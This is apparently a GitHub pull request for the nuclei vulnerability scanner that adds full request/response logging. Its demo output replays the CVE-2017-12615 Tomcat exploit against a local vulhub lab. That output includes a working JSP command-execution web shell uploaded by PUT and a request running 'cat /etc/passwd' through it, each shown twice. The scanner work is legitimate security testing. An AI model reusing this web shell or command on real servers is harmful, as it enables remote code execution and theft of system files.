Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Record all requests and responses to the results #4786

Open
wants to merge 22 commits into
base: dev
Choose a base branch
from
Open

Record all requests and responses to the results #4786

wants to merge 22 commits into from

Conversation

cn-kali-team
Copy link
Contributor

Proposed changes

When uploading a file, there is only the last request in the report, and we do not know how the file was uploaded. We need to record the complete request process

  • Added parameter -sp to stored request_response

https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615

use /vulhub/tomcat/CVE-2017-12615

➜  nuclei git:(request_response_process) go run cmd/nuclei/main.go -target http://127.0.0.1:8080/ -t /home/kali-team/nuclei-templates/http/cves/2017/CVE-2017-12615.yaml -sp -irr -j 

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.1.10

                projectdiscovery.io

[INF] Current nuclei version: v3.1.10 (latest)
[INF] Current nuclei-templates version: v9.7.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 49
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
{"template":"http/cves/2017/CVE-2017-12615.yaml","template-url":"https://cloud.projectdiscovery.io/public/CVE-2017-12615","template-id":"CVE-2017-12615","template-path":"/home/kali-team/nuclei-templates/http/cves/2017/CVE-2017-12615.yaml","info":{"name":"Apache Tomcat Servers - Remote Code Execution","author":["pikpikcu"],"tags":["cve2017","cve","rce","tomcat","kev","vulhub","apache","fileupload","intrusive"],"description":"Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.\n","impact":"Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.\n","reference":["https://github.com/vulhub/vulhub/tree/master/tomcat/cve-2017-12615","https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3cannounce.tomcat.apache.org%3e","http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392","https://nvd.nist.gov/vuln/detail/cve-2017-12615","http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html"],"severity":"high","metadata":{"vendor":"apache","product":"tomcat","shodan-query":"title:\"Apache Tomcat\"","max-request":2},"classification":{"cve-id":["cve-2017-12615"],"cwe-id":["cwe-434"],"cvss-metrics":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","cvss-score":8.1,"epss-score":0.96859,"epss-percentile":0.99641,"cpe":"cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*"},"remediation":"Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat.\n"},"type":"http","host":"127.0.0.1:8080","port":"8080","scheme":"http","url":"http://127.0.0.1:8080/","path":"/","matched-at":"http://127.0.0.1:8080/poc.jsp?cmd=cat+%2Fetc%2Fpasswd","request":"GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n","response":"HTTP/1.1 200 \r\nConnection: close\r\nContent-Length: 999\r\nContent-Type: text/html;charset=ISO-8859-1\r\nDate: Thu, 22 Feb 2024 10:08:16 GMT\r\nSet-Cookie: JSESSIONID=68C19EDEFF157787135D933FFA0C3DFF; Path=/; HttpOnly\r\n\r\n\r\nCommand: cat /etc/passwd\u003cBR\u003e\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nmessagebus:x:101:101::/var/run/dbus:/bin/false\n\r\n","request_response":[{"request":"PUT /poc.jsp/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14\r\nConnection: close\r\nContent-Length: 575\r\nAccept: */*\r\nAccept-Language: en\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n\u003c%@ page import=\"java.util.*,java.io.*\"%\u003e\r\n\u003c%\r\nif (request.getParameter(\"cmd\") != null) {\r\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"\u003cBR\u003e\");\r\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\r\n        OutputStream os = p.getOutputStream();\r\n        InputStream in = p.getInputStream();\r\n        DataInputStream dis = new DataInputStream(in);\r\n        String disr = dis.readLine();\r\n        while ( disr != null ) {\r\n                out.println(disr);\r\n                disr = dis.readLine();\r\n                }\r\n        }\r\n%\u003e\r\n","response":"HTTP/1.1 204 \r\nConnection: close\r\nContent-Length: 0\r\nDate: Thu, 22 Feb 2024 10:08:16 GMT\r\n\r\n"},{"request":"GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n","response":"HTTP/1.1 200 \r\nConnection: close\r\nContent-Length: 999\r\nContent-Type: text/html;charset=ISO-8859-1\r\nDate: Thu, 22 Feb 2024 10:08:16 GMT\r\nSet-Cookie: JSESSIONID=68C19EDEFF157787135D933FFA0C3DFF; Path=/; HttpOnly\r\n\r\n\r\nCommand: cat /etc/passwd\u003cBR\u003e\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nmessagebus:x:101:101::/var/run/dbus:/bin/false\n\r\n"}],"ip":"127.0.0.1","timestamp":"2024-02-22T18:08:16.664653216+08:00","curl-command":"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0' 'http://127.0.0.1:8080/poc.jsp?cmd=cat+%2Fetc%2Fpasswd'","matcher-status":true}
  • json format, look request_response
{
    "template": "http/cves/2017/CVE-2017-12615.yaml",
    "template-url": "https://cloud.projectdiscovery.io/public/CVE-2017-12615",
    "template-id": "CVE-2017-12615",
    "template-path": "/home/kali-team/nuclei-templates/http/cves/2017/CVE-2017-12615.yaml",
    "info": {
        "name": "Apache Tomcat Servers - Remote Code Execution",
        "author": [
            "pikpikcu"
        ],
        "tags": [
            "cve2017",
            "cve",
            "rce",
            "tomcat",
            "kev",
            "vulhub",
            "apache",
            "fileupload",
            "intrusive"
        ],
        "description": "Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.\n",
        "impact": "Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.\n",
        "reference": [
            "https://github.com/vulhub/vulhub/tree/master/tomcat/cve-2017-12615",
            "https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3cannounce.tomcat.apache.org%3e",
            "http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392",
            "https://nvd.nist.gov/vuln/detail/cve-2017-12615",
            "http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html"
        ],
        "severity": "high",
        "metadata": {
            "vendor": "apache",
            "product": "tomcat",
            "shodan-query": "title:\"Apache Tomcat\"",
            "max-request": 2
        },
        "classification": {
            "cve-id": [
                "cve-2017-12615"
            ],
            "cwe-id": [
                "cwe-434"
            ],
            "cvss-metrics": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "cvss-score": 8.1,
            "epss-score": 0.96859,
            "epss-percentile": 0.99641,
            "cpe": "cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*"
        },
        "remediation": "Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat.\n"
    },
    "type": "http",
    "host": "127.0.0.1:8080",
    "port": "8080",
    "scheme": "http",
    "url": "http://127.0.0.1:8080/",
    "path": "/",
    "matched-at": "http://127.0.0.1:8080/poc.jsp?cmd=cat+%2Fetc%2Fpasswd",
    "request": "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n",
    "response": "HTTP/1.1 200 \r\nConnection: close\r\nContent-Length: 999\r\nContent-Type: text/html;charset=ISO-8859-1\r\nDate: Thu, 22 Feb 2024 10:08:16 GMT\r\nSet-Cookie: JSESSIONID=68C19EDEFF157787135D933FFA0C3DFF; Path=/; HttpOnly\r\n\r\n\r\nCommand: cat /etc/passwd\u003cBR\u003e\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nmessagebus:x:101:101::/var/run/dbus:/bin/false\n\r\n",
    "request_response": [
        {
            "request": "PUT /poc.jsp/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14\r\nConnection: close\r\nContent-Length: 575\r\nAccept: */*\r\nAccept-Language: en\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n\u003c%@ page import=\"java.util.*,java.io.*\"%\u003e\r\n\u003c%\r\nif (request.getParameter(\"cmd\") != null) {\r\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"\u003cBR\u003e\");\r\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\r\n        OutputStream os = p.getOutputStream();\r\n        InputStream in = p.getInputStream();\r\n        DataInputStream dis = new DataInputStream(in);\r\n        String disr = dis.readLine();\r\n        while ( disr != null ) {\r\n                out.println(disr);\r\n                disr = dis.readLine();\r\n                }\r\n        }\r\n%\u003e\r\n",
            "response": "HTTP/1.1 204 \r\nConnection: close\r\nContent-Length: 0\r\nDate: Thu, 22 Feb 2024 10:08:16 GMT\r\n\r\n"
        },
        {
            "request": "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n",
            "response": "HTTP/1.1 200 \r\nConnection: close\r\nContent-Length: 999\r\nContent-Type: text/html;charset=ISO-8859-1\r\nDate: Thu, 22 Feb 2024 10:08:16 GMT\r\nSet-Cookie: JSESSIONID=68C19EDEFF157787135D933FFA0C3DFF; Path=/; HttpOnly\r\n\r\n\r\nCommand: cat /etc/passwd\u003cBR\u003e\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nmessagebus:x:101:101::/var/run/dbus:/bin/false\n\r\n"
        }
    ],
    "ip": "127.0.0.1",
    "timestamp": "2024-02-22T18:08:16.664653216+08:00",
    "curl-command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0' 'http://127.0.0.1:8080/poc.jsp?cmd=cat+%2Fetc%2Fpasswd'",
    "matcher-status": true
}

Checklist

  • Pull request is created against the dev branch
  • All checks passed (lint, unit/integration/regression tests etc.) with my changes
  • I have added tests that prove my fix is effective or that my feature works
  • I have added necessary documentation (if appropriate)

ehsandeep and others added 22 commits October 20, 2023 11:57
@ehsandeep
misc update
5aa929a
@dependabot
chore(deps): bump github.com/gin-gonic/gin from 1.9.0 to 1.9.1 (proje…
75357b1 
…ctdiscovery#4252)

Bumps [github.com/gin-gonic/gin](https://github.com/gin-gonic/gin) from 1.9.0 to 1.9.1.
- [Release notes](https://github.com/gin-gonic/gin/releases)
- [Changelog](https://github.com/gin-gonic/gin/blob/master/CHANGELOG.md)
- [Commits](gin-gonic/gin@v1.9.0...v1.9.1)

---
updated-dependencies:
- dependency-name: github.com/gin-gonic/gin
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <[email protected]>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
@ehsandeep
Merge branch 'dev'
cc46f57
@ehsandeep
Merge branch 'dev'
2d14849
@dependabot
chore(deps): bump github.com/docker/docker (projectdiscovery#4316)
19567fb 
Bumps [github.com/docker/docker](https://github.com/docker/docker) from 24.0.5+incompatible to 24.0.7+incompatible.
- [Release notes](https://github.com/docker/docker/releases)
- [Commits](moby/moby@v24.0.5...v24.0.7)

---
updated-dependencies:
- dependency-name: github.com/docker/docker
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <[email protected]>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
@ehsandeep
Merge branch 'dev'
9606591
@Xc1Ym
fix README_CN.md typos (projectdiscovery#4369)
9f18a99
@ehsandeep
Merge branch 'dev'
85d888b
@ehsandeep
Merge branch 'dev'
106ab84
@ehsandeep
Merge remote-tracking branch 'origin'
918b62b
@ehsandeep
Merge remote-tracking branch 'origin'
3a7a073
@ehsandeep
Merge remote-tracking branch 'origin'
2a7e15d
@ehsandeep
Merge remote-tracking branch 'origin'
6072a2f
@ehsandeep
version update
c3b39be
@ehsandeep
Merge remote-tracking branch 'origin'
5eac841
@ehsandeep
Merge remote-tracking branch 'origin'
7f2558f
@ehsandeep
Merge remote-tracking branch 'origin'
b38bcdf
@ehsandeep
Merge remote-tracking branch 'origin'
1f38d6b
@ehsandeep
Merge remote-tracking branch 'origin'
669eee2
@ehsandeep
Merge remote-tracking branch 'origin'
7d031d9
@ehsandeep
Merge remote-tracking branch 'origin'
0f4ad12
@cn-kali-team
Record all requests and responses to the results
3f77437
@olearycrew
Copy link
Contributor

Thanks for this contribution @cn-kali-team

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@cn-kali-team @olearycrew @ehsandeep @Xc1Ym